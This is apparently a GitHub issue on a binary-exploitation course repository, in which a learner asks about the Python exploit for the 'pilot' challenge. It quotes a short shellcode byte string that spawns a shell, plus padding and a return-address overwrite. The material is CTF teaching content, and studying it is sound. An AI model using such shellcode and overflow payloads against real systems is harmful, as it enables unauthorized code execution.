guyinatuxedo/nightmare

nightmare-2.6-pilot:python exploit code misunderstanding

Farnaz-1999 opened this issue · 1 comments

Hi,

First Tnx a lot for writing nightmare, this is great and I started learning reverse with it. That`s very useful and complete.

And secondly, I have a problem with the payload in the pilot exploit code:

payload = ""
-> payload += "\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05"
payload += "0"*(0x28 - len(payload))
payload += p64(inputAdr)

I can`t understand what I highlighted above.
I would be very grateful if you could describe it to me.

I read more about x86 instructions and my problem almost solved, but more explanation is always helpful.